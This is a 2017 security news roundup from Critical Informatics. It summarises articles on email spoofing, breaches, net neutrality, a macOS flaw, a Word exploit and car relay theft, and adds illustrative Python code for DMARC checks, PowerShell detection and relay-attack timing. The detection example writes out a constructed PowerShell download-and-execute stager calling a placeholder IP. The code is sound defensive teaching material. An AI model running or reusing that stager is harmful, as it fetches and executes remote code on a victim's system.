IT Security News Blast 11-29-2017

Government Cyber Threats

Infosec Trends to Watch For in Local Government
The critical infrastructure that is maintained and operated by local government is enabled by and dependent upon information technology systems. These technologies support running water, electrical grids, and first responder telecommunications. […] Given the importance of the technology systems, we need to keep our eyes open to the trends in how they are managed. In this Part 1 of this series, I call out the practices of yesterday that will disappear, and I take a first look at where those practices are going.
https://criticalinformatics.com/5-it-trends-changing-local-government/

 

Survey: Financial Costs of a Cyber Attack Increasing Year over Year
The survey found that 21 percent of enterprises report that monetary losses from cybersecurity events have increased year over year. In fact, enterprise organizations estimate financial losses at an average of $884,000, compared to estimates of $471,000 from the previous year.
https://www.healthcare-informatics.com/news-item/cybersecurity/survey-financial-costs-cyber-attack-increasing-year-over-year

 

BANK OF ENGLAND SURVEY: British politicians pose the biggest risk to the UK financial system
The risk to the financial system most cited by respondents in the 2017 H2 survey was “UK political risk,” mentioned by 91% of respondents and up 9 percentage points since 2017 H1. Political risk was also overwhelmingly cited as the number one source of risk, by 67% of the 96 respondents, compared to geopolitics (7%), cyber attack (7%) and the risk of a UK economic downturn (3%).
http://www.businessinsider.com/bank-of-england-risk-survey-biggest-threat-2017-11

 

Health-care group pushes for tighter email security amid fears over fraud
The email protocol was not designed to check if the return address on a message is accurate. Anyone using email can place any name or email address on a message. NH-ISAC will make its members pledge in 2018 to use DMARC, an add-on protocol that ensures unauthorized people cannot send emails from a particular domain.
http://thehill.com/policy/cybersecurity/362024-more-than-half-of-emails-addressed-from-healthcare-providers-are-frauds
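Worked example, added here and not part of The Hill article or NH-ISAC's pledge: a minimal DMARC evaluator in Python. It parses a published DMARC TXT record and checks whether the SPF or DKIM result is aligned with the domain in the From header the recipient actually sees. The record text, domain names and authentication results are constructed for the example, and the organizational-domain logic is a two-label simplification of what a real receiver derives from the Public Suffix List. The spoofed case shows why SPF on its own does not stop the fraud the article describes: the attacker's own envelope domain passes SPF, but it is not aligned with the visible From domain, so DMARC fails and the domain owner's p=reject policy applies.

```python
"""Minimal DMARC evaluator (added example, not code from The Hill or NH-ISAC).
All domains, records and authentication results below are constructed."""
from dataclasses import dataclass
from typing import Dict, Optional


def parse_dmarc_record(txt: str) -> Dict[str, str]:
    """Parse a DMARC TXT record such as 'v=DMARC1; p=reject; adkim=s' into tags.
    Defaults adkim/aspf to relaxed ('r'), as the specification does."""
    tags: Dict[str, str] = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed DMARC tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1" or tags.get("p") not in ("none", "quarantine", "reject"):
        raise ValueError("not a usable DMARC record: needs v=DMARC1 and p=none|quarantine|reject")
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain, simplified to the last two labels.
    Assumption for this example: real code consults the Public Suffix List
    so that multi-label public suffixes (e.g. co.uk) are handled correctly."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: Optional[str], from_domain: str, mode: str) -> bool:
    """Identifier alignment: strict ('s') needs an exact match, relaxed ('r')
    needs the same organizational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


@dataclass
class AuthResults:
    from_domain: str            # domain in the RFC5322.From header the recipient sees
    spf_result: str             # 'pass', 'fail', 'none', ...
    spf_domain: Optional[str]   # RFC5321.MailFrom (envelope) domain SPF was checked against
    dkim_result: str
    dkim_domain: Optional[str]  # d= tag of the DKIM signature that validated


def evaluate_dmarc(record_txt: str, r: AuthResults) -> Dict[str, object]:
    """DMARC passes if at least one of SPF or DKIM both passed and is aligned;
    otherwise the receiver applies the domain owner's p= policy."""
    tags = parse_dmarc_record(record_txt)
    spf_aligned = r.spf_result == "pass" and aligned(r.spf_domain, r.from_domain, tags["aspf"])
    dkim_aligned = r.dkim_result == "pass" and aligned(r.dkim_domain, r.from_domain, tags["adkim"])
    passed = spf_aligned or dkim_aligned
    return {
        "dmarc": "pass" if passed else "fail",
        "spf_aligned": spf_aligned,
        "dkim_aligned": dkim_aligned,
        "disposition": "none" if passed else tags["p"],
    }


# Constructed sample: a hospital domain that publishes a reject policy.
HOSPITAL_RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc@hospital.example"

# 1) Spoof: the attacker's own envelope domain passes SPF, but it is not the From domain.
SPOOFED = AuthResults("hospital.example", "pass", "bulk-sender.example", "none", None)

# 2) Legitimate mail from a subdomain, DKIM-signed with the parent domain's key.
LEGIT = AuthResults("mail.hospital.example", "fail", "bounce.esp.example", "pass", "hospital.example")

if __name__ == "__main__":
    print("spoof :", evaluate_dmarc(HOSPITAL_RECORD, SPOOFED))
    print("legit :", evaluate_dmarc(HOSPITAL_RECORD, LEGIT))
    print("strict:", evaluate_dmarc(HOSPITAL_RECORD + "; adkim=s", LEGIT))
```

The third call shows the operational trade-off behind a pledge like NH-ISAC's: switching to strict alignment (adkim=s) makes the subdomain's legitimately signed mail fail, so a domain owner has to inventory every sending service before moving from p=none to p=reject.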

 

Cottage Health System fined $2M for 2 separate data breaches linked to ‘basic’ security failures
A California health system has agreed to a $2 million settlement with the state attorney general to settle claims that it failed to implement basic security protocols, which led to the exposure of nearly 55,000 medical records. […] In the first incident, which stretched from 2011 to 2013, patient information was accessible and searchable online without any encryption, password protection or firewall in place to prevent unauthorized access. More than 50,000 patient records were accessed by the time the security flaws were discovered.
https://www.fiercehealthcare.com/privacy-security/cottage-health-system-2-million-california-xavier-becerra-data-breach-information

 

Cyber terrorism ‘an emergent threat’
[The] most relevant cyber terrorist actors currently pose a “low likelihood” of inflicting severe physical destruction through digital means before 2020. However, the report from the Cambridge Centre for Risk Studies said cyber terrorism – defined as an act of politically motivated violence involving physical damage or personal injury caused by a remote digital interference with technology systems – is an “emergent threat”.
http://www.nwemail.co.uk/news/national/article/Cyber-terrorism-an-emergent-threat-612dd406-835a-492b-ba30-8cdfa3d0220c-ds

 

A Consumer Product Safety Commission for cyber?
We need a governance system — to include enforcement, incentives and penalties — to ensure effective implementation of stronger security design practices. […] This is problematic, because market forces alone will not solve our crisis of quality. Companies have little incentive to spend precious resources on information security prior to product launch, and the average consumer is not tech-savvy enough to question how a technology product makes their digital communications more or less safe.
https://fcw.com/articles/2017/11/28/rudolph-comment-cyber-cpsc.aspx

 

IoT Regulation: One Rule to Bind Them All vs Mission Impossible
In the US, the Senate bill ‘The Internet of Things Cyber Security Improvement Act 2017’ is laying the ground rules for IoT device security. Although the legislation will only apply to government agency suppliers and affiliates, it could well establish a benchmark for device manufacture that will influence commercial production.
https://www.infosecurity-magazine.com/magazine-features/iot-regulation-one-rule-vs-mission/

 

Congress poised to jam through reauthorization of mass surveillance
Civil libertarians have urged Congress to take this reauthorization as an opportunity to implement meaningful reforms to shield innocent Americans from mass surveillance while ensuring that federal intelligence agencies have the tools they need to protect the United States from foreign threats. Some in Congress, however, seem committed to running roughshod over the Fourth Amendment.
http://thehill.com/opinion/cybersecurity/361875-congress-poised-to-jam-through-reauthorization-of-mass-surveillance

 

Internet censorship: It’s on the rise and Silicon Valley is helping it happen
According to York, in the past few months, the EFF has seen Snapchat and Medium comply with the government of Saudi Arabia, an attitude “unthinkable in previous years”. “Internet censorship creates inequality — economic inequality, inequality of ideas, educational inequality, and more,” she said.
http://www.zdnet.com/article/internet-censorship-its-on-the-rise-and-silicon-valley-is-helping-it-happen/

 

Comcast hints at plan for paid fast lanes after net neutrality repeal
[With] Republican Ajit Pai now in charge at the Federal Communications Commission, Comcast’s stance has changed. While the company still says it won’t block or throttle Internet content, it has dropped its promise about not instituting paid prioritization. Instead, Comcast now vaguely says that it won’t “discriminate against lawful content” or impose “anti-competitive paid prioritization.” The change in wording suggests that Comcast may offer paid fast lanes to websites or other online services, such as video streaming providers, after Pai’s FCC eliminates the net neutrality rules next month.
https://arstechnica.com/tech-policy/2017/11/comcast-quietly-drops-promise-not-to-charge-tolls-for-internet-fast-lanes/

 

Internet’s Top Cop Under Trump May Struggle to Run at Web Speeds
The FCC sets rules designed to prevent bad behavior, while the FTC acts after wrongdoing has occurred. That distinction has become a flash point in the debate over Pai’s proposal, which would change the way the government regulates the internet with far-reaching implications for a host of industries. Opponents say that reactive nature means the trade commission is too slow to oversee the rapidly evolving digital economy.
https://www.bloomberg.com/news/articles/2017-11-28/debate-rages-over-ftc-as-web-referee-after-net-neutrality-gutted

 

Cybersecurity skills shortage creating recruitment chaos
CISOs recognize these issues and many organizations are actively hanging a “help wanted” sign to find cybersecurity talent. Unfortunately, it is exceedingly difficult to bring new people onboard. Why? Experienced cybersecurity professionals are in high demand, so organizations are engaged in a battle royale to coax them away from their present employers and outbid others for their services.
https://www.csoonline.com/article/3238745/security/cybersecurity-skills-shortage-creating-recruitment-chaos.html

 

Security firm reveals another NSA leak
“Critical data belonging to the United States Army Intelligence and Security Command (INSCOM), a joint U.S. Army and National Security Agency Defense Department command tasked with gathering intelligence for US military and political leaders, leaked onto the public internet, exposing internal data and virtual systems used for classified communications to anyone with an internet connection,” wrote Vickery and Dan O’Sullivan, a cyber resilience analyst at UpGuard.
https://fcw.com/articles/2017/11/28/nsa-leak-upguard-johnson.aspx

 

Major Apple security flaw grants admin access on macOS High Sierra without password
When the problem is exploited, the user is authenticated into a “System Administrator” account and is given full ability to view files and even reset or change passwords for pre-existing users on that machine. Apple ID email addresses tied to users on the Mac can be removed and altered, as well.
https://www.theverge.com/2017/11/28/16711782/apple-macos-high-sierra-critical-password-security-flaw

 

Boffins craft perfect ‘head generator’ to beat facial recognition
The result, the boffins claimed, is that their model can provide a realistic-looking result, even when it’s faced with “challenging poses and scenarios” including different lighting conditions, such that the “fake” face “blends naturally into the context”.
https://www.theregister.co.uk/2017/11/28/boffins_craft_perfect_head_generator_to_beat_ai_facial_recognition/

 

Hackers are digging into Microsoft Word flaw that existed for last 17 years
Once the document is opened, the user sees a blank document, and only the message Enable Editing is visible. This message is only to cover the actual functioning that is happening in the background. The malicious code gets downloaded and runs a PowerShell script so that Cobalt Strike gets installed and the system is hijacked.
https://www.hackread.com/hackers-are-digging-into-microsoft-word-flaw-that-exists-for-last-17-year/
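Detection example, added here and not hackread's code: the behaviour the article describes (a Word document that launches PowerShell to fetch and run a stager) is visible in process-creation telemetry as an Office process spawning a shell. The Python below applies that rule to a list of constructed Sysmon-style events, decodes a base64 -EncodedCommand payload the way PowerShell does (UTF-16LE), and grades the command line by the indicators defenders usually look for. The event records, paths, payload and the 198.51.100.7 address (a documentation range) are all constructed; the Office process list is generalised beyond Word as an assumption.

```python
"""Detection of Office-spawned PowerShell (added example, not hackread's code).
The events below are constructed, not real telemetry."""
import base64
import re
from typing import Dict, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # assumption: generalised beyond Word
SHELLS = {"powershell.exe", "pwsh.exe"}

# Each indicator: (regex, what it suggests). Applied to the raw command line
# plus any decoded -EncodedCommand payload.
INDICATORS = [
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b", "downloads content"),
    (r"(?i)\biex\b|invoke-expression", "evaluates a string as code"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-nop\b|-noprofile\b", "profile disabled"),
    (r"(?i)https?://", "contains a URL"),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell's -EncodedCommand (-e/-ec/-enc) carries base64 of a UTF-16LE string."""
    m = re.search(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert when an Office process spawns PowerShell, else None."""
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    if parent not in OFFICE_APPS or child not in SHELLS:
        return None
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + (" " + decoded if decoded else "")
    reasons = [label for pattern, label in INDICATORS if re.search(pattern, text)]
    if decoded:
        reasons.insert(0, "base64-encoded command")
    return {
        "parent": parent,
        "child": child,
        "decoded": decoded,
        "reasons": reasons,
        "severity": "high" if reasons else "medium",  # parent/child alone is already worth a look
    }


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [a for a in (analyze_event(e) for e in events) if a]


# Constructed stager, encoded the way an attacker would pass it to -enc.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # admin running a script: not Office-spawned
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",  # print helper Word normally spawns
     "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only the first event fires; the decoded payload exposes the download-and-execute chain that the blank "Enable Editing" document hides from the user, and the same parent/child rule catches the behaviour regardless of which Office bug was used to trigger it.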

 

Gone in Seconds: Hackers Steal Mercedes Car without Key
A surveillance video shared by West Midlands Police, United Kingdom, shows car-hacking thieves stealing a Mercedes within a few seconds, without keys and without even touching the vehicle, thanks to a relay device. A relay box is an electrically operated switch which works in such a way that other than metal it can detect and receive signals through doors, windows, and walls.
https://www.hackread.com/gone-seconds-hackers-steal-mercedes-car-without-key/
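Simulation, added here and not code from hackread or West Midlands Police, of what the relay device in that video does and of the check that defeats it. The model assumes a keyless-entry scheme in which the car sends a random challenge and the fob answers with an HMAC under a shared secret (the protocol, the propagation and processing times, and the 5 m range limit are assumptions, not any manufacturer's design). The relay never learns the secret: two boxes simply carry the exchange from the car to the fob inside the house and back, so the cryptography passes. What changes is the round-trip time, and a car that bounds the round trip refuses the relayed exchange.

```python
"""Keyless-entry relay attack vs. a round-trip-time bound (added example).
Protocol and timings are simplified assumptions, not a real vehicle's design."""
import hashlib
import hmac
import os
from typing import Dict

SPEED_OF_LIGHT_M_PER_NS = 0.3   # radio propagates about 0.3 m per nanosecond
FOB_PROCESSING_NS = 1_000       # assumed fixed time the fob takes to compute its answer
RELAY_BOX_DELAY_NS = 400        # assumed per-box receive/retransmit latency
MAX_RANGE_M = 5                 # assumed: how close the fob must be for the car to open


class KeyFob:
    """Answers the car's challenge with an HMAC over a shared secret.
    A relay does not need the secret: it only forwards challenge and answer."""

    def __init__(self, secret: bytes) -> None:
        self._secret = secret

    def respond(self, challenge: bytes) -> bytes:
        return hmac.new(self._secret, challenge, hashlib.sha256).digest()


class Car:
    def __init__(self, secret: bytes, enforce_rtt: bool) -> None:
        self._secret = secret
        self.enforce_rtt = enforce_rtt
        # Worst-case legitimate round trip: fob at MAX_RANGE_M plus its processing time.
        self.rtt_limit_ns = FOB_PROCESSING_NS + 2 * MAX_RANGE_M / SPEED_OF_LIGHT_M_PER_NS

    def decide(self, challenge: bytes, response: bytes, rtt_ns: float) -> Dict[str, object]:
        expected = hmac.new(self._secret, challenge, hashlib.sha256).digest()
        crypto_ok = hmac.compare_digest(expected, response)
        in_range = rtt_ns <= self.rtt_limit_ns
        return {
            "crypto_ok": crypto_ok,
            "rtt_ns": round(rtt_ns, 1),
            "in_range": in_range,
            "unlocked": crypto_ok and (in_range or not self.enforce_rtt),
        }


def attempt_unlock(car: Car, fob: KeyFob, fob_distance_m: float, relay_boxes: int = 0) -> Dict[str, object]:
    """One challenge-response exchange. With relay_boxes=2 the thieves' pair of
    boxes carries the exchange between the car and the distant fob; the fob still
    answers correctly, only the round trip gets longer."""
    challenge = os.urandom(16)
    response = fob.respond(challenge)  # forwarded unchanged by any relay
    rtt_ns = (2 * fob_distance_m / SPEED_OF_LIGHT_M_PER_NS
              + FOB_PROCESSING_NS
              + relay_boxes * RELAY_BOX_DELAY_NS)
    return car.decide(challenge, response, rtt_ns)


SECRET = os.urandom(32)
OWNER_FOB = KeyFob(SECRET)


def run_scenarios() -> Dict[str, bool]:
    """Owner at the door (2 m) vs. fob relayed from inside the house (30 m)."""
    naive = Car(SECRET, enforce_rtt=False)
    bounded = Car(SECRET, enforce_rtt=True)
    return {
        "naive_owner_at_door": attempt_unlock(naive, OWNER_FOB, 2)["unlocked"],
        "naive_relay_from_house": attempt_unlock(naive, OWNER_FOB, 30, relay_boxes=2)["unlocked"],
        "bounded_owner_at_door": attempt_unlock(bounded, OWNER_FOB, 2)["unlocked"],
        "bounded_relay_from_house": attempt_unlock(bounded, OWNER_FOB, 30, relay_boxes=2)["unlocked"],
        "bounded_wrong_fob": attempt_unlock(bounded, KeyFob(os.urandom(32)), 2)["unlocked"],
    }


if __name__ == "__main__":
    for name, unlocked in run_scenarios().items():
        print(f"{name:28s} unlocked={unlocked}")
```

The naive car opens for the relayed fob because every bit of the exchange is genuine; only the bounded car notices that the answer arrived too late to have come from within a few metres. That is why advice to keep the fob in a signal-blocking pouch works as a stopgap: it removes the relay's input rather than relying on the car to measure distance.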

 

Ajit Pai blames Cher and Hulk actor for ginning up net neutrality support
In a speech hosted by conservative group R Street and the Lincoln Network, Pai also addressed criticism from MCU actor Mark Ruffalo, actress Alyssa Milano, former Star Trek actor George Takei, and Silicon Valley actor Kumail Nanjiani. Pai also claimed that Twitter and other Web companies pose a greater threat to Internet freedom than Internet service providers like Comcast.
https://arstechnica.com/tech-policy/2017/11/ajit-pai-blames-cher-and-hulk-actor-for-ginning-up-net-neutrality-support/

 

====

Critical Informatics and the Critical Informatics logo are the trademarks of Critical Informatics, Inc. All other brand names, trademarks, service marks and copyrights are the property of their respective owners.  © 2017 Critical Informatics, Inc. All rights reserved.